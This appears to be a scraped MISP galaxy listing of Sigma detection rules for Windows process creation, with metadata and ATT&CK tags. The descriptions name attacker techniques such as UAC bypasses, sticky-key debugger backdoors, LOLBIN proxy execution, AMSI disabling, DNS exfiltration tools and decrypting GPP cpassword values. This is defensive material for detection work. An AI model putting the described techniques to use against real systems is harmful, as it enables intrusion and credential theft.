Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)

Internal MISP references

UUID 18988e1b-9087-4f8a-82fe-0414dce49878 which can be used as unique global reference for Execute Code with Pester.bat as Parent in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali
creation_date 2022/08/20
falsepositive ['Legitimate use of Pester for writing tests for Powershell scripts and modules']
filename proc_creation_win_lolbin_pester.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001', 'attack.defense_evasion', 'attack.t1216']
Related clusters

To see the related clusters, click here.

Explorer NOUACCHECK Flag

Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks

Internal MISP references

UUID 534f2ef7-e8a2-4433-816d-c91bccde289b which can be used as unique global reference for Explorer NOUACCHECK Flag in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/02/23
falsepositive ['Domain Controller User Logon', 'Unknown how many legitimate software products use that method']
filename proc_creation_win_explorer_nouaccheck.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

XBAP Execution From Uncommon Locations Via PresentationHost.EXE

Detects the execution of ".xbap" (Browser Applications) files via PresentationHost.EXE from an uncommon location. These files can be abused to run malicious ".xbap" files any bypass AWL

Internal MISP references

UUID d22e2925-cfd8-463f-96f6-89cec9d9bc5f which can be used as unique global reference for XBAP Execution From Uncommon Locations Via PresentationHost.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/01
falsepositive ['Legitimate ".xbap" being executed via "PresentationHost"']
filename proc_creation_win_presentationhost_uncommon_location_exec.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Set Suspicious Files as System Files Using Attrib.EXE

Detects the usage of attrib with the "+s" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs

Internal MISP references

UUID efec536f-72e8-4656-8960-5e85d091345b which can be used as unique global reference for Set Suspicious Files as System Files Using Attrib.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/28
falsepositive ['Unknown']
filename proc_creation_win_attrib_system_susp_paths.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564.001']
Related clusters

To see the related clusters, click here.

User Added To Highly Privileged Group

Detects addition of users to highly privileged groups via "Net" or "Add-LocalGroupMember".

Internal MISP references

UUID 10fb649c-3600-4d37-b1e6-56ea90bb7e09 which can be used as unique global reference for User Added To Highly Privileged Group in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2024/02/23
falsepositive ['Administrative activity that must be investigated']
filename proc_creation_win_susp_add_user_privileged_group.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1098']
Related clusters

To see the related clusters, click here.

Suspicious Debugger Registration Cmdline

Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).

Internal MISP references

UUID ae215552-081e-44c7-805f-be16f975c8a2 which can be used as unique global reference for Suspicious Debugger Registration Cmdline in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro
creation_date 2019/09/06
falsepositive ['Unknown']
filename proc_creation_win_registry_install_reg_debugger_backdoor.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1546.008']
Related clusters

To see the related clusters, click here.

Potential Remote Desktop Tunneling

Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.

Internal MISP references

UUID 8a3038e8-9c9d-46f8-b184-66234a160f6f which can be used as unique global reference for Potential Remote Desktop Tunneling in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch, Elastic (idea)
creation_date 2022/09/27
falsepositive ['Unknown']
filename proc_creation_win_susp_remote_desktop_tunneling.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021']
Related clusters

To see the related clusters, click here.

Potential Defense Evasion Via Binary Rename

Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.

Internal MISP references

UUID 36480ae1-a1cb-4eaa-a0d6-29801d7e9142 which can be used as unique global reference for Potential Defense Evasion Via Binary Rename in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Matthew Green @mgreen27, Ecco, James Pemberton @4A616D6573, oscd.community, Andreas Hunkeler (@Karneades)
creation_date 2019/06/15
falsepositive ['Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist']
filename proc_creation_win_renamed_binary.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036.003']
Related clusters

To see the related clusters, click here.

User Added to Remote Desktop Users Group

Detects addition of users to the local Remote Desktop Users group via "Net" or "Add-LocalGroupMember".

Internal MISP references

UUID ffa28e60-bdb1-46e0-9f82-05f7a61cc06e which can be used as unique global reference for User Added to Remote Desktop Users Group in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/12/06
falsepositive ['Administrative activity']
filename proc_creation_win_susp_add_user_remote_desktop_group.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.lateral_movement', 'attack.t1133', 'attack.t1136.001', 'attack.t1021.001']
Related clusters

To see the related clusters, click here.

Control Panel Items

Detects the malicious use of a control panel item

Internal MISP references

UUID 0ba863e6-def5-4e50-9cea-4dd8c7dc46a4 which can be used as unique global reference for Control Panel Items in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)
creation_date 2020/06/22
falsepositive ['Unknown']
filename proc_creation_win_control_panel_item.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.t1218.002', 'attack.persistence', 'attack.t1546']
Related clusters

To see the related clusters, click here.

Arbitrary MSI Download Via Devinit.EXE

Detects a certain command line flag combination used by "devinit.exe", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system

Internal MISP references

UUID 90d50722-0483-4065-8e35-57efaadd354d which can be used as unique global reference for Arbitrary MSI Download Via Devinit.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/01/11
falsepositive ['Unknown']
filename proc_creation_win_devinit_lolbin_usage.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Suspicious AddinUtil.EXE CommandLine Execution

Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with suspicious Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store payload.

Internal MISP references

UUID 631b22a4-70f4-4e2f-9ea8-42f84d9df6d8 which can be used as unique global reference for Suspicious AddinUtil.EXE CommandLine Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
creation_date 2023/09/18
falsepositive ['Unknown']
filename proc_creation_win_addinutil_suspicious_cmdline.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Potential Persistence Via Microsoft Compatibility Appraiser

Detects manual execution of the "Microsoft Compatibility Appraiser" task via schtasks. In order to trigger persistence stored in the "\AppCompatFlags\TelemetryController" registry key.

Internal MISP references

UUID f548a603-c9f2-4c89-b511-b089f7e94549 which can be used as unique global reference for Potential Persistence Via Microsoft Compatibility Appraiser in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sreeman
creation_date 2020/09/29
falsepositive ['Unknown']
filename proc_creation_win_schtasks_persistence_windows_telemetry.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1053.005']
Related clusters

To see the related clusters, click here.

Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution

Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary

Internal MISP references

UUID a20391f8-76fb-437b-abc0-dba2df1952c6 which can be used as unique global reference for Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/01/11
falsepositive ['Legitimate use by developers as part of NodeJS development with Visual Studio Tools']
filename proc_creation_win_pressanykey_lolbin_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Suspicious AgentExecutor PowerShell Execution

Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by 6th positional argument

Internal MISP references

UUID c0b40568-b1e9-4b03-8d6c-b096da6da9ab which can be used as unique global reference for Suspicious AgentExecutor PowerShell Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), memory-shards
creation_date 2022/12/24
falsepositive ['Unknown']
filename proc_creation_win_agentexecutor_susp_usage.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Suspicious HWP Sub Processes

Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation

Internal MISP references

UUID 023394c4-29d5-46ab-92b8-6a534c6f447b which can be used as unique global reference for Suspicious HWP Sub Processes in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/10/24
falsepositive ['Unknown']
filename proc_creation_win_hwp_exploits.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.initial_access', 'attack.t1566.001', 'attack.execution', 'attack.t1203', 'attack.t1059.003', 'attack.g0032']
Related clusters

To see the related clusters, click here.

UAC Bypass via Windows Firewall Snap-In Hijack

Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in

Internal MISP references

UUID e52cb31c-10ed-4aea-bcb7-593c9f4a315b which can be used as unique global reference for UAC Bypass via Windows Firewall Snap-In Hijack in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch, Elastic (idea)
creation_date 2022/09/27
falsepositive ['Unknown']
filename proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1548']
Related clusters

To see the related clusters, click here.

Suspicious Query of MachineGUID

Use of reg to get MachineGuid information

Internal MISP references

UUID f5240972-3938-4e56-8e4b-e33893176c1f which can be used as unique global reference for Suspicious Query of MachineGUID in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/01
falsepositive ['Unknown']
filename proc_creation_win_reg_machineguid.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1082']
Related clusters

To see the related clusters, click here.

InfDefaultInstall.exe .inf Execution

Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.

Internal MISP references

UUID ce7cf472-6fcc-490a-9481-3786840b5d9b which can be used as unique global reference for InfDefaultInstall.exe .inf Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/07/13
falsepositive ['Unknown']
filename proc_creation_win_infdefaultinstall_execute_sct_scripts.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Windows Share Mount Via Net.EXE

Detects when a share is mounted using the "net.exe" utility

Internal MISP references

UUID f117933c-980c-4f78-b384-e3d838111165 which can be used as unique global reference for Windows Share Mount Via Net.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/02
falsepositive ['Legitimate activity by administrators and scripts']
filename proc_creation_win_net_use_mount_share.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.002']
Related clusters

To see the related clusters, click here.

Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location

Detects potentially suspicious execution of the Regasm/Regsvcs utilities from a potentially suspicious location

Internal MISP references

UUID cc368ed0-2411-45dc-a222-510ace303cb2 which can be used as unique global reference for Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/25
falsepositive ['Unknown']
filename proc_creation_win_regasm_regsvcs_uncommon_location_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.009']
Related clusters

To see the related clusters, click here.

DLL Loaded via CertOC.EXE

Detects when a user installs certificates by using CertOC.exe to loads the target DLL file.

Internal MISP references

UUID 242301bc-f92f-4476-8718-78004a6efd9f which can be used as unique global reference for DLL Loaded via CertOC.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/10/23
falsepositive ['Unknown']
filename proc_creation_win_certoc_load_dll.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

New Virtual Smart Card Created Via TpmVscMgr.EXE

Detects execution of "Tpmvscmgr.exe" to create a new virtual smart card.

Internal MISP references

UUID c633622e-cab9-4eaa-bb13-66a1d68b3e47 which can be used as unique global reference for New Virtual Smart Card Created Via TpmVscMgr.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/06/15
falsepositive ['Legitimate usage by an administrator']
filename proc_creation_win_tpmvscmgr_add_virtual_smartcard.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

WinDbg/CDB LOLBIN Usage

Detects usage of "cdb.exe" to launch 64-bit shellcode or arbitrary processes or commands from a debugger script file

Internal MISP references

UUID b5c7395f-e501-4a08-94d4-57fe7a9da9d2 which can be used as unique global reference for WinDbg/CDB LOLBIN Usage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Beyu Denis, oscd.community, Nasreddine Bencherchali
creation_date 2019/10/26
falsepositive ['Legitimate use of debugging tools']
filename proc_creation_win_lolbin_cdb.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1106', 'attack.defense_evasion', 'attack.t1218', 'attack.t1127']
Related clusters

To see the related clusters, click here.

Regsvr32 DLL Execution With Uncommon Extension

Detects a "regsvr32" execution where the DLL doesn't contain a common file extension.

Internal MISP references

UUID 50919691-7302-437f-8e10-1fe088afa145 which can be used as unique global reference for Regsvr32 DLL Execution With Uncommon Extension in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/07/17
falsepositive ['Other legitimate extensions currently not in the list either from third party or specific Windows components.']
filename proc_creation_win_regsvr32_uncommon_extension.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1574', 'attack.execution']
Related clusters

To see the related clusters, click here.

HackTool - Htran/NATBypass Execution

Detects executable names or flags used by Htran or Htran-like tools (e.g. NATBypass)

Internal MISP references

UUID f5e3b62f-e577-4e59-931e-0a15b2b94e1e which can be used as unique global reference for HackTool - Htran/NATBypass Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/12/27
falsepositive ['Unknown']
filename proc_creation_win_hktl_htran_or_natbypass.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1090', 'attack.s0040']
Related clusters

To see the related clusters, click here.

PUA - NirCmd Execution

Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity

Internal MISP references

UUID 4e2ed651-1906-4a59-a78a-18220fca1b22 which can be used as unique global reference for PUA - NirCmd Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/01/24
falsepositive ['Legitimate use by administrators']
filename proc_creation_win_pua_nircmd.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1569.002', 'attack.s0029']
Related clusters

To see the related clusters, click here.

Renamed SysInternals DebugView Execution

Detects suspicious renamed SysInternals DebugView execution

Internal MISP references

UUID cd764533-2e07-40d6-a718-cfeec7f2da7f which can be used as unique global reference for Renamed SysInternals DebugView Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2020/05/28
falsepositive ['Unknown']
filename proc_creation_win_renamed_sysinternals_debugview.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.resource_development', 'attack.t1588.002']
Related clusters

To see the related clusters, click here.

Potentially Suspicious Execution Of Regasm/Regsvcs With Uncommon Extension

Detects potentially suspicious execution of the Regasm/Regsvcs utilities with an uncommon extension.

Internal MISP references

UUID e9f8f8cc-07cc-4e81-b724-f387db9175e4 which can be used as unique global reference for Potentially Suspicious Execution Of Regasm/Regsvcs With Uncommon Extension in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/13
falsepositive ['Unknown']
filename proc_creation_win_regasm_regsvcs_uncommon_extension_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.009']
Related clusters

To see the related clusters, click here.

Uncommon Child Process Of Conhost.EXE

Detects uncommon "conhost" child processes. This could be a sign of "conhost" usage as a LOLBIN or potential process injection activity.

Internal MISP references

UUID 7dc2dedd-7603-461a-bc13-15803d132355 which can be used as unique global reference for Uncommon Child Process Of Conhost.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author omkar72
creation_date 2020/10/25
falsepositive ['Unknown']
filename proc_creation_win_conhost_susp_child_process.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1202']
Related clusters

To see the related clusters, click here.

Suspicious Rundll32 Invoking Inline VBScript

Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452

Internal MISP references

UUID 1cc50f3f-1fc8-4acf-b2e9-6f172e1fdebd which can be used as unique global reference for Suspicious Rundll32 Invoking Inline VBScript in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/03/05
falsepositive ['Unknown']
filename proc_creation_win_rundll32_inline_vbs.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1055']
Related clusters

To see the related clusters, click here.

Compress Data and Lock With Password for Exfiltration With WINZIP

An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities

Internal MISP references

UUID e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d which can be used as unique global reference for Compress Data and Lock With Password for Exfiltration With WINZIP in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/07/27
falsepositive ['Unknown']
filename proc_creation_win_winzip_password_compression.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.t1560.001']
Related clusters

To see the related clusters, click here.

Use of W32tm as Timer

When configured with suitable command line arguments, w32tm can act as a delay mechanism

Internal MISP references

UUID 6da2c9f5-7c53-401b-aacb-92c040ce1215 which can be used as unique global reference for Use of W32tm as Timer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/09/25
falsepositive ['Legitimate use']
filename proc_creation_win_w32tm.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1124']
Related clusters

To see the related clusters, click here.

Potential Provisioning Registry Key Abuse For Binary Proxy Execution

Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe".

Internal MISP references

UUID 2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25 which can be used as unique global reference for Potential Provisioning Registry Key Abuse For Binary Proxy Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel
creation_date 2023/08/08
falsepositive ['Unknown']
filename proc_creation_win_registry_provlaunch_provisioning_command.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

File Download From IP Based URL Via CertOC.EXE

Detects when a user downloads a file from an IP based URL using CertOC.exe

Internal MISP references

UUID b86f6dea-0b2f-41f5-bdcc-a057bd19cd6a which can be used as unique global reference for File Download From IP Based URL Via CertOC.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/10/18
falsepositive ['Unknown']
filename proc_creation_win_certoc_download_direct_ip.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.execution', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet

Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.

Internal MISP references

UUID 85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98 which can be used as unique global reference for Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), frack113
creation_date 2021/07/20
falsepositive ['Unknown']
filename proc_creation_win_powershell_zip_compress.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.t1074.001']
Related clusters

To see the related clusters, click here.

Greedy File Deletion Using Del

Detects execution of the "del" builtin command to remove files using greedy/wildcard expression. This is often used by malware to delete content of folders that perhaps contains the initial malware infection or to delete evidence.

Internal MISP references

UUID 204b17ae-4007-471b-917b-b917b315c5db which can be used as unique global reference for Greedy File Deletion Using Del in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113 , X__Junior (Nextron Systems)
creation_date 2021/12/02
falsepositive ['Unknown']
filename proc_creation_win_cmd_del_greedy_deletion.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070.004']
Related clusters

To see the related clusters, click here.

Potential Recon Activity Using DriverQuery.EXE

Detect usage of the "driverquery" utility to perform reconnaissance on installed drivers

Internal MISP references

UUID 9fc3072c-dc8f-4bf7-b231-18950000fadd which can be used as unique global reference for Potential Recon Activity Using DriverQuery.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/19
falsepositive ['Legitimate usage by some scripts might trigger this as well']
filename proc_creation_win_driverquery_recon.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.discovery']

Suspicious Group And Account Reconnaissance Activity Using Net.EXE

Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE Check if the user that executed the commands is suspicious (e.g. service accounts, LOCAL_SYSTEM)

Internal MISP references

UUID d95de845-b83c-4a9a-8a6a-4fc802ebf6c0 which can be used as unique global reference for Suspicious Group And Account Reconnaissance Activity Using Net.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems)
creation_date 2019/01/16
falsepositive ['Inventory tool runs', 'Administrative activity']
filename proc_creation_win_net_groups_and_accounts_recon.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1087.001', 'attack.t1087.002']
Related clusters

To see the related clusters, click here.

UAC Bypass Using IEInstal - Process

Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)

Internal MISP references

UUID 80fc36aa-945e-4181-89f2-2f907ab6775d which can be used as unique global reference for UAC Bypass Using IEInstal - Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/08/30
falsepositive ['Unknown']
filename proc_creation_win_uac_bypass_ieinstal.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

HackTool - Stracciatella Execution

Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics.

Internal MISP references

UUID 7a4d9232-92fc-404d-8ce1-4c92e7caf539 which can be used as unique global reference for HackTool - Stracciatella Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author pH-T (Nextron Systems)
creation_date 2023/04/17
falsepositive ['Unlikely']
filename proc_creation_win_hktl_stracciatella_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.t1059', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Potential Network Sniffing Activity Using Network Tools

Detects potential network sniffing via use of network tools such as "tshark", "windump". Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.

Internal MISP references

UUID ba1f7802-adc7-48b4-9ecb-81e227fddfd5 which can be used as unique global reference for Potential Network Sniffing Activity Using Network Tools in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, oscd.community, Nasreddine Bencherchali (Nextron Systems)
creation_date 2019/10/21
falsepositive ['Legitimate administration activity to troubleshoot network issues']
filename proc_creation_win_susp_network_sniffing.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.discovery', 'attack.t1040']
Related clusters

To see the related clusters, click here.

DNS Exfiltration and Tunneling Tools Execution

Well-known DNS Exfiltration tools execution

Internal MISP references

UUID 98a96a5a-64a0-4c42-92c5-489da3866cb0 which can be used as unique global reference for DNS Exfiltration and Tunneling Tools Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Daniil Yugoslavskiy, oscd.community
creation_date 2019/10/24
falsepositive ['Unlikely']
filename proc_creation_win_dns_exfiltration_tools_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.exfiltration', 'attack.t1048.001', 'attack.command_and_control', 'attack.t1071.004', 'attack.t1132.001']
Related clusters

To see the related clusters, click here.

Share And Session Enumeration Using Net.EXE

Detects attempts to enumerate file shares, printer shares and sessions using "net.exe" with the "view" flag.

Internal MISP references

UUID 62510e69-616b-4078-b371-847da438cc03 which can be used as unique global reference for Share And Session Enumeration Using Net.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Endgame, JHasenbusch (ported for oscd.community)
creation_date 2018/10/30
falsepositive ['Legitimate use of net.exe utility by legitimate user']
filename proc_creation_win_net_view_share_and_sessions_enum.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1018']
Related clusters

To see the related clusters, click here.

Suspicious Child Process Of BgInfo.EXE

Detects suspicious child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript

Internal MISP references

UUID 811f459f-9231-45d4-959a-0266c6311987 which can be used as unique global reference for Suspicious Child Process Of BgInfo.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/16
falsepositive ['Unknown']
filename proc_creation_win_bginfo_suspicious_child_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.005', 'attack.defense_evasion', 'attack.t1218', 'attack.t1202']
Related clusters

To see the related clusters, click here.

Potential Regsvr32 Commandline Flag Anomaly

Detects a potential command line flag anomaly related to "regsvr32" in which the "/i" flag is used without the "/n" which should be uncommon.

Internal MISP references

UUID b236190c-1c61-41e9-84b3-3fe03f6d76b0 which can be used as unique global reference for Potential Regsvr32 Commandline Flag Anomaly in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/07/13
falsepositive ['Administrator typo might cause some false positives']
filename proc_creation_win_regsvr32_flags_anomaly.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.010']
Related clusters

To see the related clusters, click here.

Findstr GPP Passwords

Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.

Internal MISP references

UUID 91a2c315-9ee6-4052-a853-6f6a8238f90d which can be used as unique global reference for Findstr GPP Passwords in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
